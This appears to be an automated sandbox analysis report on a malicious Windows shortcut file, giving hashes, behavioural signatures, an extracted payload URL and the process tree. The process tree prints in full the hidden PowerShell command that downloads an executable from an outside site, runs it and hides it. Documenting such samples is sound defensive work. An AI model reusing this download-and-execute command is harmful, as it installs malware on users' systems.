Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
06-08-2024 01:18
Static task
static1
Behavioral task
behavioral1
Sample
15e851a4cb9c2270b109a2a346b9ce9a8c15104825b211a4194b3113c60f8ba3.lnk
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
15e851a4cb9c2270b109a2a346b9ce9a8c15104825b211a4194b3113c60f8ba3.lnk
Resource
win10v2004-20240802-en
General
-
Target
15e851a4cb9c2270b109a2a346b9ce9a8c15104825b211a4194b3113c60f8ba3.lnk
-
Size
2KB
-
MD5
1d5c4d5d15b7556fe88893a7352efbf8
-
SHA1
124b6911e134fc0ef7d75293bf7736941a5b26e9
-
SHA256
15e851a4cb9c2270b109a2a346b9ce9a8c15104825b211a4194b3113c60f8ba3
-
SHA512
f678b94722a6d1b6ca4c84c6ea4ea9f116fb56d79000d646f6d1f044cd40069738809babc18972c637d4c457ba82aa1e207cebee756a05cc030e30a8b7b9b244
Malware Config
Extracted
http://www.requimacofradian.site/dfjbhskdbfvsdsfgsh/bzdjgbsdzjkngdsnhgtuonidsgtsgb/neio.exe
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2432 PoWeRsheLl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2432 PoWeRsheLl.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2432 PoWeRsheLl.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1656 wrote to memory of 2432 1656 cmd.exe 31 PID 1656 wrote to memory of 2432 1656 cmd.exe 31 PID 1656 wrote to memory of 2432 1656 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\15e851a4cb9c2270b109a2a346b9ce9a8c15104825b211a4194b3113c60f8ba3.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsheLl.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -HiDdEn --hiDDeN ---HiddeN ----HidDEn -Command msadp32.acm;(new-object System.Net.WebClient).DownloadFile('http://www.requimacofradian.site/dfjbhskdbfvsdsfgsh/bzdjgbsdzjkngdsnhgtuonidsgtsgb/neio.exe','doubles.exe');./'doubles.exe';(get-item 'doubles.exe').Attributes += 'Hidden';2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-